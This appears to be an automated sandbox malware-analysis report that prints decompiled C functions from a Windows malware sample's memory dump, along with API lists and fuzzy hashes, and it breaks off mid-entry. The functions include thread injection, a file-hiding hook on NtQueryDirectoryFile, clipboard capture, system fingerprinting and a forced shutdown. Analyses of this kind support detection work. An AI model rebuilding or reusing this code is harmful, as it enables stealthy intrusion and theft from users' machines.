        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00407C1B
        • Thread32First.KERNEL32(00000000,?), ref: 00407C33
        • Thread32Next.KERNEL32(00000000,0000001C), ref: 00407C4B
        • CloseHandle.KERNEL32(00000000), ref: 00407C56
        • NtCreateThread.NTDLL(?,?,?,?,?,?,?,?), ref: 00407C8F
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CreateThread32$CloseFirstHandleInformationNextProcessQuerySnapshotThreadToolhelp32
        • String ID:
        • API String ID: 1144773994-0
        • Opcode ID: 6a6e617b322aab2b58d9897f0f92ea16a33ddaf7694e75928d30f8990438f251
        • Instruction ID: 1ad56231f162078d763af7627e4c73ba5b9e3adc2c51b843d29e235836c985fe
        • Opcode Fuzzy Hash: 6a6e617b322aab2b58d9897f0f92ea16a33ddaf7694e75928d30f8990438f251
        • Instruction Fuzzy Hash: 75214D71908109EBDF119FA1DC48EEF7B79FF44744F008036F905A1150D735A951DBA5
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00407F27(void* __ecx, void* __edx, void* __eflags, signed int _a8) {
        				short _v524;
        				char _v532;
        				short _v1072;
        				struct _WIN32_FIND_DATAW _v1120;
        				short _v1636;
        				short _v1640;
        				void* _t23;
        				int _t27;
        				void* _t35;
        				void* _t36;
        				WCHAR* _t38;
        				void* _t39;
        
        				_t36 = __edx;
        				_t35 = __ecx;
        				_t14 = _a8;
        				_t38 = E0040F5EA(_a8 | 0xffffffff,  *_t14);
        				if(_t38 != 0) {
        					ExpandEnvironmentStringsW(_t38,  &_v1636, 0x103);
        					E0040F15E(_t38);
        					_t39 = FindFirstFileW( &_v1640,  &_v1120);
        					__eflags = _t39;
        					if(_t39 != 0) {
        						PathRemoveFileSpecW( &_v1636);
        						do {
        							__eflags = _v1120.ftCreationTime.dwFileAttributes & 0x00000010;
        							if(__eflags == 0) {
        								PathCombineW( &_v524,  &_v1636,  &_v1072);
        								E00413599(_t35, _t36, __eflags,  &_v532, 0,  &_v532);
        							}
        							_t27 = FindNextFileW(_t39,  &(_v1120.ftCreationTime));
        							__eflags = _t27;
        						} while (_t27 != 0);
        						FindClose(_t39);
        					}
        					_t23 = 1;
        				} else {
        					_t23 = 0;
        				}
        				return _t23;
        			}
















        APIs
        • ExpandEnvironmentStringsW.KERNEL32(00000000,00000103,00000103,?), ref: 00407F59
        • FindFirstFileW.KERNEL32(?,?,00000000), ref: 00407F72
        • PathRemoveFileSpecW.SHLWAPI(?), ref: 00407F83
        • PathCombineW.SHLWAPI(?,?,?), ref: 00407FA8
        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00407FC7
        • FindClose.KERNEL32(00000000), ref: 00407FD2
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: FileFind$Path$CloseCombineEnvironmentExpandFirstNextRemoveSpecStrings
        • String ID:
        • API String ID: 3464319278-0
        • Opcode ID: 26ccd842fb8647def088d114041e1cb72f7b8454cc91e184369bab8dced5ebda
        • Instruction ID: 7b424616c19bbf423e2e416058e0e9d47113851a515604c9ea99cd79c550aa44
        • Opcode Fuzzy Hash: 26ccd842fb8647def088d114041e1cb72f7b8454cc91e184369bab8dced5ebda
        • Instruction Fuzzy Hash: 511194728092096BC331DBA0CC48EDB77DCAF45310F008A3AF954D3180EB78EA0487AA
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040B6B3() {
        				intOrPtr _t3;
        				intOrPtr _t8;
        				long _t12;
        				struct HWINSTA__* _t13;
        				struct HDESK__* _t15;
        
        				_t3 =  *0x414ad4; // 0x241f5a8
        				_t12 = 0;
        				_t13 = OpenWindowStationA( *(_t3 + 0x78), 0, 0x10000000);
        				if(_t13 != 0) {
        					if(SetProcessWindowStation(_t13) != 0) {
        						_t8 =  *0x414ad4; // 0x241f5a8
        						_t15 = OpenDesktopA( *(_t8 + 0x7c), 0, 0, 0x10000000);
        						if(_t15 != 0) {
        							SetThreadDesktop(_t15);
        							_t12 = 1;
        							CloseDesktop(_t15);
        						}
        					}
        					CloseWindowStation(_t13);
        				}
        				return _t12;
        			}









        APIs
        • OpenWindowStationA.USER32(?,00000000,10000000), ref: 0040B6C7
        • SetProcessWindowStation.USER32(00000000), ref: 0040B6D4
        • OpenDesktopA.USER32(?,00000000,00000000,10000000), ref: 0040B6E9
        • SetThreadDesktop.USER32(00000000), ref: 0040B6F6
        • CloseDesktop.USER32(00000000), ref: 0040B6FF
        • CloseWindowStation.USER32(00000000), ref: 0040B706
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: DesktopStationWindow$CloseOpen$ProcessThread
        • String ID:
        • API String ID: 2658375134-0
        • Opcode ID: 793ef29611ea4294420e94f81890e73a71ba9eac8b95574a29606d2867495125
        • Instruction ID: 9223afcdfaa37a91e713c2f587de49640207d50e06809ef103f05dd7ef9f79ac
        • Opcode Fuzzy Hash: 793ef29611ea4294420e94f81890e73a71ba9eac8b95574a29606d2867495125
        • Instruction Fuzzy Hash: 73F0BD72191025AFD7116BA4ACC8DEB3BACEFC93E23174076F51193520D7654C119BAC
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 74%
        			E00412CCE(signed int* __esi, signed int _a4) {
        				signed int _v12;
        				char _v13;
        				signed int _v20;
        				signed int _v24;
        				intOrPtr _v28;
        				intOrPtr _v32;
        				char _v36;
        				short _v72;
        				signed short _v74;
        				signed short _v76;
        				signed short _v78;
        				signed short _v80;
        				signed char _v86;
        				signed int _v88;
        				signed short _v90;
        				signed short _v92;
        				char _v288;
        				struct _OSVERSIONINFOW _v368;
        				short _v600;
        				void* __ebx;
        				void* __edi;
        				signed int _t73;
        				signed int _t76;
        				signed int _t77;
        				intOrPtr _t117;
        				signed int _t124;
        				signed int _t126;
        				intOrPtr _t138;
        				void* _t142;
        				void* _t143;
        				void* _t144;
        				void* _t145;
        				signed int* _t147;
        				void* _t148;
        
        				_t147 = __esi;
        				_t126 = 1;
        				_v13 = 0;
        				if( *__esi == 0) {
        					_t124 = E00412322();
        					 *__esi = _t124;
        					if(_t124 == 0) {
        						return 0;
        					}
        					_v13 = 1;
        				}
        				__eflags = _a4 & 0x00000001;
        				if((_a4 & 0x00000001) == 0) {
        					L9:
        					__eflags = _a4 & 0x00000002;
        					if((_a4 & 0x00000002) != 0) {
        						_push( &_v12);
        						_t145 = 4;
        						_v12 = 0x1020716;
        						_t126 = E0041233D(_t147, 0x2713, _t133, _t145);
        					}
        					L11:
        					__eflags = _a4 & 0x00000004;
        					if((_a4 & 0x00000004) == 0) {
        						L16:
        						__eflags = _t126;
        						if(_t126 == 0) {
        							L29:
        							__eflags = _v13 - 1;
        							if(_v13 == 1) {
        								E0040F15E( *_t147);
        								 *_t147 =  *_t147 & 0x00000000;
        								__eflags =  *_t147;
        							}
        							L31:
        							return _t126;
        						}
        						__eflags = _a4 & 0x00000008;
        						if((_a4 & 0x00000008) == 0) {
        							L20:
        							__eflags = _t126;
        							if(_t126 == 0) {
        								goto L29;
        							}
        							__eflags = _a4 & 0x00000010;
        							if((_a4 & 0x00000010) == 0) {
        								L28:
        								__eflags = _t126;
        								if(_t126 != 0) {
        									goto L31;
        								}
        								goto L29;
        							}
        							_t73 = GetModuleFileNameW(0,  &_v600, 0x103);
        							_v12 = _t73;
        							__eflags = _t73;
        							if(_t73 > 0) {
        								__eflags = 0;
        								 *((short*)(_t148 + _t73 * 2 - 0x254)) = 0;
        								_t126 = E004123A9(0, 0, _t147, 0x271e,  &_v600);
        							}
        							_v12 = 0x103;
        							__eflags = _t126;
        							if(_t126 == 0) {
        								goto L29;
        							} else {
        								_t76 =  *0x414b50(2,  &_v600,  &_v12);
        								__eflags = _t76;
        								if(_t76 != 0) {
        									_t77 = _v12;
        									__eflags = _t77;
        									if(_t77 > 0) {
        										__eflags = 0;
        										 *((short*)(_t148 + _t77 * 2 - 0x254)) = 0;
        										_t126 = E004123A9(0, 0, _t147, 0x2721,  &_v600);
        									}
        								}
        								goto L28;
        							}
        						}
        						_v368.dwOSVersionInfoSize = 0x11c;
        						GetVersionExW( &_v368);
        						_v36 = _v368.dwMajorVersion;
        						_v32 = _v368.dwMinorVersion;
        						_v28 = _v368.dwBuildNumber;
        						_t137 = _v88 & 0x0000ffff;
        						_v24 = (_v90 & 0x0000ffff) << 0x00000010 | _v92 & 0x0000ffff;
        						_v20 = (_v86 & 0x000000ff) << 0x00000010 | _v88 & 0x0000ffff;
        						_push( &_v36);
        						_t142 = 0x14;
        						_t126 = E0041233D(_t147, 0x271c, _v88 & 0x0000ffff, _t142);
        						__eflags = _t126;
        						if(_t126 == 0) {
        							goto L29;
        						}
        						_v12 =  *0x414d98() & 0x0000ffff;
        						_push( &_v12);
        						_t143 = 2;
        						_t126 = E0041233D(_t147, 0x271d, _t137, _t143);
        						goto L20;
        					}
        					__eflags = _t126;
        					if(_t126 == 0) {
        						goto L29;
        					}
        					_v12 = E0040F233();
        					_push( &_v12);
        					_t144 = 4;
        					_t126 = E0041233D(_t147, 0x2719, _t133, _t144);
        					__eflags = _t126;
        					if(_t126 == 0) {
        						goto L29;
        					}
        					_v12 = E0040F272();
        					_t126 = E0041233D(_t147, 0x271b, _t133, _t144,  &_v12);
        					__eflags = _t126;
        					if(_t126 == 0) {
        						goto L29;
        					}
        					_v12 = GetTickCount();
        					_t126 = E0041233D(_t147, 0x271a, _t133, _t144,  &_v12);
        					goto L16;
        				}
        				_t138 =  *0x414d10; // 0x6c646e61
        				_t146 =  &_v288;
        				E0040F5CC(_t138,  &_v288);
        				_t117 =  *0x414b7c; // 0x418000
        				_t7 = _t117 + 8; // 0x30
        				_v80 =  *_t7 & 0x000000ff;
        				_t9 = _t117 + 9; // 0x60000000
        				_v78 =  *_t9 & 0x000000ff;
        				_t11 = _t117 + 0xa; // 0xea600000
        				_t133 =  *_t11 & 0x000000ff;
        				_v76 =  *_t11 & 0x000000ff;
        				_t13 = _t117 + 0xb; // 0xea6000
        				_v74 =  *_t13 & 0x000000ff;
        				_v72 = 0;
        				_t126 = E004123A9( *_t11 & 0x000000ff, __eflags, _t147, 0x2711, _t146);
        				__eflags = _t126;
        				if(_t126 == 0) {
        					goto L11;
        				}
        				__eflags = _v80;
        				if(__eflags != 0) {
        					_t126 = E004123A9(_t133, __eflags, _t147, 0x2712,  &_v80);
        				}
        				__eflags = _t126;
        				if(_t126 == 0) {
        					goto L11;
        				} else {
        					goto L9;
        				}
        			}






































        APIs
        • GetTickCount.KERNEL32 ref: 00412DE7
        • GetVersionExW.KERNEL32(?,00000000,00000000), ref: 00412E25
          • Part of subcall function 00412322: RtlAllocateHeap.NTDLL(00000008,00000020,00412CE9), ref: 0041232C
        • GetUserDefaultUILanguage.KERNEL32(?), ref: 00412E83
        • GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,00000000), ref: 00412EC1
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AllocateCountDefaultFileHeapLanguageModuleNameTickUserVersion
        • String ID: andle
        • API String ID: 1370906912-46660432
        • Opcode ID: 784d41bb76efd19ac85aae6fa58174823098579b1f5df9c2cbc5f21122c8e007
        • Instruction ID: 975b72f89d3779e9a10d89c50f516e1201c85f278f138894c489d004d9e2df97
        • Opcode Fuzzy Hash: 784d41bb76efd19ac85aae6fa58174823098579b1f5df9c2cbc5f21122c8e007
        • Instruction Fuzzy Hash: 9561D970A4025C6ADB11DBA8D9447EEBBF4EF45304F04406BE984DB381D7BC8ADACB58
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00406266(signed int _a4, void* _a8, _Unknown_base(*)()* _a12, void* _a16, struct _ERESOURCE_LITE _a20, void* _a24, long _a28, union _FILE_INFORMATION_CLASS _a32, long _a36, struct _EXCEPTION_RECORD _a40, char _a44) {
        				char _v524;
        				WCHAR* _v1544;
        				void _v1548;
        				void* __edi;
        				void* __esi;
        				long _t45;
        				signed int _t51;
        				void* _t53;
        				signed int _t59;
        				signed int _t60;
        				void* _t61;
        				void* _t62;
        				union _FILE_INFORMATION_CLASS _t68;
        				void* _t69;
        				intOrPtr _t71;
        				char* _t74;
        				signed int* _t76;
        				void* _t78;
        				WCHAR* _t79;
        				signed int* _t80;
        
        				_t68 = _a32;
        				_t45 = NtQueryDirectoryFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _t68, _a36, _a40, _a44);
        				_a40 = _t45;
        				if(_t45 != 0 || _a24 == _t45 || _t68 != 1 && _t68 != 2 && _t68 != 3 && _t68 != 0xc) {
        					L31:
        					return _a40;
        				} else {
        					_a36 = _a36 & 0x00000000;
        					if(NtQueryObject(_a4, 1,  &_v1548, 0x400,  &_a36) != 0) {
        						goto L31;
        					}
        					_t79 =  *0x414780; // 0xf60057
        					_v1544[_v1548 & 0x0000ffff] = 0;
        					_t89 = _t79;
        					if(_t79 != 0) {
        						L11:
        						_t51 = lstrcmpiW(_t79, _v1544);
        						if(_t51 != 0) {
        							goto L31;
        						}
        						_a44 = _a44 & _t51;
        						_a4 = _a4 & _t51;
        						_t53 = _t68 - 1;
        						if(_t53 == 0) {
        							_a44 = 0x40;
        							L20:
        							_a4 = 0x3c;
        							L21:
        							_t69 = 0;
        							_t80 = 0;
        							do {
        								_t76 = _t80;
        								_t80 = _t69 + _a24;
        								if(E00405D47(_t80 + _a44,  *((intOrPtr*)(_t80 + _a4))) == 0) {
        									goto L26;
        								}
        								_t60 =  *_t80;
        								if(_t60 == 0) {
        									__eflags = _t76;
        									if(_t76 == 0) {
        										_a40 = 0xc000000f;
        									} else {
        										 *_t76 =  *_t76 & 0x00000000;
        									}
        									goto L31;
        								}
        								if(_t76 != 0) {
        									 *_t76 =  *_t76 + _t60;
        								}
        								L26:
        								_t59 =  *_t80;
        								_t69 = _t69 + _t59;
        							} while (_t59 > 0);
        							goto L31;
        						}
        						_t61 = _t53 - 1;
        						if(_t61 == 0) {
        							_a44 = 0x44;
        							goto L20;
        						}
        						_t62 = _t61 - 1;
        						if(_t62 == 0) {
        							_a44 = 0x5e;
        							goto L20;
        						} else {
        							if(_t62 == 9) {
        								_a44 = 0xc;
        								_a4 = 8;
        							}
        							goto L21;
        						}
        					} else {
        						E0040AE64( &_v524, _t89);
        						_t79 = E0040F2C5( &_v524);
        						 *0x414780 = _t79;
        						_t74 = 0x4141f5;
        						_t78 = 2;
        						do {
        							_t24 = _t74 - 1; // 0x30000
        							_t71 =  *0x414ad4; // 0x241f5a8
        							 *_t74 = E0040F649( *((intOrPtr*)(_t71 + ( *_t24 & 0x000000ff) * 4)));
        							_t74 = _t74 + 2;
        							_t78 = _t78 - 1;
        						} while (_t78 != 0);
        						if(_t79 == 0) {
        							goto L31;
        						}
        						goto L11;
        					}
        				}
        			}
























        APIs
        • NtQueryDirectoryFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00406294
        • NtQueryObject.NTDLL(?,00000001,?,00000400,00000000), ref: 004062DF
        • lstrcmpiW.KERNEL32(00F60057,?), ref: 00406354
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Query$DirectoryFileObjectlstrcmpi
        • String ID: <$@
        • API String ID: 2113822959-1426351568
        • Opcode ID: 1944ff6dfb329d042403614678f08897eb4d9b11376bd25ed0181ea8a650f634
        • Instruction ID: 7de8b15f00870881e6b7ef0282915685d7ee43d5db203d9f3cf7cc35b81cdaa6
        • Opcode Fuzzy Hash: 1944ff6dfb329d042403614678f08897eb4d9b11376bd25ed0181ea8a650f634
        • Instruction Fuzzy Hash: ED41AD721102099BCF218F59C884AEA7BA5FF88354F06413BFD06A62D0D779DCA5DB98
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040AE64(WCHAR* __esi, void* __eflags) {
        				long _v8;
        				WCHAR* _v1028;
        				void _v1032;
        				void* _t22;
        
        				E0040AE3C(__esi);
        				_t22 = CreateFileW(__esi, 0x80000000, 3, 0, 3, 0x2000000, 0);
        				 *__esi = 0;
        				if(_t22 != 0xffffffff) {
        					_v8 = _v8 & 0;
        					if(NtQueryObject(_t22, 1,  &_v1032, 0x400,  &_v8) == 0 && _v1032 < 0x104) {
        						_v1028[_v1032 & 0x0000ffff] = 0;
        						lstrcpyW(__esi, _v1028);
        					}
        					return CloseHandle(_t22);
        				}
        				return 0;
        			}

        APIs
          • Part of subcall function 0040AE3C: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,004069ED,?,?), ref: 0040AE5D
        • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,02000000,00000000,?), ref: 0040AE88
        • NtQueryObject.NTDLL(00000000,00000001,?,00000400,?), ref: 0040AEB0
        • lstrcpyW.KERNEL32(?,?), ref: 0040AEE2
        • CloseHandle.KERNEL32(00000000), ref: 0040AEE9
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseCreateFileFolderHandleObjectPathQuerySpeciallstrcpy
        • String ID:
        • API String ID: 2309192175-0
        • Opcode ID: 20ce9198a7f0c93447197e7a91faac10e0b57601d9b25a34d7b40757999068b7
        • Instruction ID: b7f087c276d9d341e8cfee504d6859a87dc98d40a8ebf656d1b30a92691f448b
        • Opcode Fuzzy Hash: 20ce9198a7f0c93447197e7a91faac10e0b57601d9b25a34d7b40757999068b7
        • Instruction Fuzzy Hash: DE01A2B5640314A7EB209B64EC45BEE72BCEF48704F1040A6B706F61D1E6749A42879D
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • socket.WS2_32(?,00000001,00000006), ref: 004106D1
        • bind.WS2_32(00000000,?,?), ref: 004106E4
        • listen.WS2_32(00000000,?), ref: 004106F3
        • closesocket.WS2_32(00000000), ref: 004106FE
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: bindclosesocketlistensocket
        • String ID:
        • API String ID: 952684215-0
        • Opcode ID: f7d94fb3d4fe02aacc3e8ac7926b2463f9a3db617c54fb7ef3445826f1114da5
        • Instruction ID: d070a8ef47206c14f8795a1e8b12b31bd7964bc1c69a8395d5a4a8da797fe4f0
        • Opcode Fuzzy Hash: f7d94fb3d4fe02aacc3e8ac7926b2463f9a3db617c54fb7ef3445826f1114da5
        • Instruction Fuzzy Hash: 32E09B3150212166C6202B759C4CEDBBA55BF81771F018321F9B1D22E0EB6488D1C6DC
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 96%
        			E0040652B(void* __ebp, signed int _a4) {
        				intOrPtr _v0;
        				void* _v4;
        				void* _v8;
        				void* __ecx;
        				void* __edi;
        				void* _t9;
        				intOrPtr _t12;
        				void* _t23;
        				void* _t25;
        				void* _t28;
        				int _t39;
        				void* _t42;
        				void* _t43;
        
        				_t42 = __ebp;
        				_t39 = _a4;
        				_t9 = GetClipboardData(_t39);
        				_t28 = _t9;
        				_v4 = _t28;
        				if(_t28 != 0 && (_t39 == 1 || _t39 == 0xd || _t39 == 7)) {
        					GlobalFix(_t28);
        					_t23 = _t9;
        					if(_t23 != 0) {
        						_a4 = _a4 & 0x00000000;
        						if(_t39 == 0xd) {
        							_push(_t42);
        							_t26 = _t23;
        							_t43 = E0040F649(_t23);
        							_t12 = E0040F583(_t11, _t23);
        							_v0 = _t12;
        							if(_t12 != 0) {
        								_t40 = " ";
        								E0040642E(_t26, 1, " ");
        								if(_t43 != 0) {
        									E0040642E(_t26, _t43, _a4);
        								}
        								E0040642E(_t26, 1, _t40);
        							}
        						} else {
        							_t41 = " ";
        							E0040642E(_t25, 1, " ");
        							_t27 = _t23;
        							if(E0040F637(_t23) != 0) {
        								E0040642E(_t27, _t19, _t23);
        							}
        							E0040642E(_t27, 1, _t41);
        						}
        						E0040F15E(_a4);
        						_t28 = _v8;
        						GlobalUnWire(_t28);
        					}
        				}
        				return _t28;
        			}

        APIs
        • GetClipboardData.USER32(?), ref: 00406533
        • GlobalFix.KERNEL32(00000000), ref: 0040655C
        • GlobalUnWire.KERNEL32(?), ref: 004065EF
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Global$ClipboardDataWire
        • String ID:
        • API String ID: 2697403597-0
        • Opcode ID: c2c17a544fe198e3da8c0a678302f7f255488ae7b248c3bb062ac7569988dec5
        • Instruction ID: 3d4401b48050bf601ecf09fe8be14ff2f9f129239b046d4be2e0f68863b01aa2
        • Opcode Fuzzy Hash: c2c17a544fe198e3da8c0a678302f7f255488ae7b248c3bb062ac7569988dec5
        • Instruction Fuzzy Hash: C911B47690421267C6253B266C4897F6A999BC5314B17043FF94BB36D5CE3CCC2681AE
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 68%
        			E0040F233() {
        				struct _FILETIME _v12;
        				struct _SYSTEMTIME _v28;
        
        				GetSystemTime( &_v28);
        				SystemTimeToFileTime( &_v28,  &_v12);
        				asm("adc ecx, 0xfe624e21");
        				return E004116C4(_v12.dwLowDateTime + 0x2ac18000, _v12.dwHighDateTime, 0x989680, 0);
        			}

        APIs
        • GetSystemTime.KERNEL32(?,?,?,?,00412DA5,00000000,00000000), ref: 0040F23D
        • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,00412DA5,00000000,00000000), ref: 0040F24B
        • __aulldiv.LIBCMT ref: 0040F26B
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Time$System$File__aulldiv
        • String ID:
        • API String ID: 1459046340-0
        • Opcode ID: 4079fd7a9e235c70150cff8bc555946218972f43bf08e4fd0f7655045d2ffe83
        • Instruction ID: 7feaf26f5f91c6dea9a257d8bb6c62f8876f05dd757cb0aa631b2e1babccb2bf
        • Opcode Fuzzy Hash: 4079fd7a9e235c70150cff8bc555946218972f43bf08e4fd0f7655045d2ffe83
        • Instruction Fuzzy Hash: DEE0B87990020D67CF00EBE4DD4AEDE777CEB4430DF040455B601E3151E674E6458754
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • socket.WS2_32(00000000,00000002,00000011), ref: 0041098F
        • bind.WS2_32(00000000,?,?), ref: 004109A2
        • closesocket.WS2_32(00000000), ref: 004109AD
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: bindclosesocketsocket
        • String ID:
        • API String ID: 1873677229-0
        • Opcode ID: b82aa2d89544f60e7f13e4b373ee805cca4f8564c667f576303abb369ac61820
        • Instruction ID: 800f2efb5104115cf60c2ba11a59b116037af1c0b9d68e45f4c06f8fcb3aab59
        • Opcode Fuzzy Hash: b82aa2d89544f60e7f13e4b373ee805cca4f8564c667f576303abb369ac61820
        • Instruction Fuzzy Hash: D8E0867150212066D2201B695C0DDDB6A549B457B1F024321FD60922E1E76848C186EC
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040B938() {
        				intOrPtr _v0;
        
        				E00411622(L"SeShutdownPrivilege");
        				return ExitWindowsEx((0 | _v0 != 0x00000000) + 0x00000001 | 0x00000004, 0) & 0xffffff00 | _t11 != 0x00000000;
        			}

        APIs
          • Part of subcall function 00411622: OpenProcessToken.ADVAPI32(FFFFFFFF,00000028,?,?,0040ADE9,SeDebugPrivilege), ref: 00411637
          • Part of subcall function 00411622: LookupPrivilegeValueW.ADVAPI32(00000000), ref: 00411657
          • Part of subcall function 00411622: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000010,00000000,00000000), ref: 0041166D
          • Part of subcall function 00411622: GetLastError.KERNEL32 ref: 00411677
          • Part of subcall function 00411622: FindCloseChangeNotification.KERNELBASE(?), ref: 00411686
        • ExitWindowsEx.USER32(00000001,00000000), ref: 0040B952
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Token$AdjustChangeCloseErrorExitFindLastLookupNotificationOpenPrivilegePrivilegesProcessValueWindows
        • String ID: SeShutdownPrivilege
        • API String ID: 1103692467-3733053543
        • Opcode ID: 7eac313e53d096201356e4c881d4be3addb3bf13563b54df970efdb37ae7d46e
        • Instruction ID: 2850f48743e552c901a41c77a83842efa37ed9fe977d32590c55ef76a6a49b17
        • Opcode Fuzzy Hash: 7eac313e53d096201356e4c881d4be3addb3bf13563b54df970efdb37ae7d46e
        • Instruction Fuzzy Hash: D2C0805164530066F20077B20D06B5F35984F50B94F0DC87EB141D1491C57CC650513C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00412BFD() {
        				void* _t1;
        
        				E0040F21C(_t1, 0x4155b4, 0, 0x24);
        				if(InitializeSecurityDescriptor(0x4155c0, 1) != 0 && SetSecurityDescriptorDacl(0x4155c0, 1, 0, 0) != 0) {
        					 *0x4155bc =  *0x4155bc & 0x00000000;
        					 *0x4155b4 = 0xc;
        					 *0x4155b8 = 0x4155c0;
        				}
        				return 1;
        			}

        APIs
        • InitializeSecurityDescriptor.ADVAPI32(004155C0,00000001,004155B4,00000000,00000024,00000000,0040ACAD), ref: 00412C14
        • SetSecurityDescriptorDacl.ADVAPI32(004155C0,00000001,00000000,00000000), ref: 00412C25
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: DescriptorSecurity$DaclInitialize
        • String ID:
        • API String ID: 625223987-0
        • Opcode ID: 72a57eab827d0b6639170df0336378e0f2baab9f540573fedf0b2d1dae722da2
        • Instruction ID: 810c3b2a7dacfa6547dfdbfe7b5dc493ae66a857247e7214a7acc5f0501eb031
        • Opcode Fuzzy Hash: 72a57eab827d0b6639170df0336378e0f2baab9f540573fedf0b2d1dae722da2
        • Instruction Fuzzy Hash: B8E04870785B10FAE2301B11AD4DBCB39576781B05F104039F200AD1D8D7E954814A9C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 37%
        			E00405C1F(intOrPtr _a4, short* _a8, intOrPtr _a12, intOrPtr* _a16) {
        				intOrPtr _t10;
        				intOrPtr _t13;
        				void* _t15;
        				intOrPtr _t16;
        				short* _t17;
        				void* _t18;
        				void* _t19;
        
        				_t17 = _a8;
        				_t16 = _a4;
        				_t18 = _t16 -  *0x414b68; // 0x73560000
        				if(_t18 == 0) {
        					L2:
        					if(_t17 == 0) {
        						L4:
        						_t13 = 0;
        						L5:
        						if(_t17 == 0) {
        							L8:
        							_t9 = 0;
        							L9:
        							_t10 = E00407B46(_t13, _t15, _t16, _t9, _a12, _t13);
        							if(_t10 == 0) {
        								return  *0x414c0c(_t16, _t17, _a12, _a16);
        							}
        							 *_a16 = _t10;
        							return 0;
        						}
        						_t9 =  *((intOrPtr*)(_t17 + 4));
        						if( *((intOrPtr*)(_t17 + 4)) == 0 ||  *_t17 <= 0) {
        							goto L8;
        						} else {
        							goto L9;
        						}
        					}
        					_t13 =  *((intOrPtr*)(_t17 + 4));
        					goto L5;
        				}
        				_t19 = _t16 -  *0x414ca8; // 0x75300000
        				if(_t19 != 0) {
        					goto L4;
        				}
        				goto L2;
        			}

        APIs
        • LdrGetProcedureAddress.NTDLL(?,?,?,?), ref: 00405C78
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AddressProcedure
        • String ID:
        • API String ID: 3653107232-0
        • Opcode ID: c98d815fd6741e72ebeab39791a94d1842b3540ea8d65b8ba09837a5dc4a3b7d
        • Instruction ID: a4df5363a4cfde1567e341ddf548240104d0a92343ee604254e2b1ef622cbcc6
        • Opcode Fuzzy Hash: c98d815fd6741e72ebeab39791a94d1842b3540ea8d65b8ba09837a5dc4a3b7d
        • Instruction Fuzzy Hash: 4701D132209B19ABEB249F54CC00CBB73A9EB81B50705443AEC05B3280D738FC908FA9
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00407066(void* __ecx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
        				long _v8;
        				void* _t9;
        				void* _t18;
        
        				_t18 = 0;
        				if(_a12 <= 0) {
        					L4:
        					_t9 = _t18;
        				} else {
        					while(InternetReadFile(_a4, _a8 + _t18, _a12 - _t18,  &_v8) != 0) {
        						if(_v8 == 0) {
        							goto L4;
        						} else {
        							_t18 = _t18 + _v8;
        							if(_t18 < _a12) {
        								continue;
        							} else {
        								goto L4;
        							}
        						}
        						goto L5;
        					}
        					_t9 = 0;
        				}
        				L5:
        				return _t9;
        			}

        APIs
        • InternetReadFile.WININET(?,?,?,?), ref: 00407085
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: FileInternetRead
        • String ID:
        • API String ID: 778332206-0
        • Opcode ID: 4c27b2217d11043de3481ba3151263d24bd1767be6b9fe08a2f398d3a517715e
        • Instruction ID: 8ecd0bfb204803e725bf59e70b43c2576defa7fa31a4285be4d75c4d576e0f77
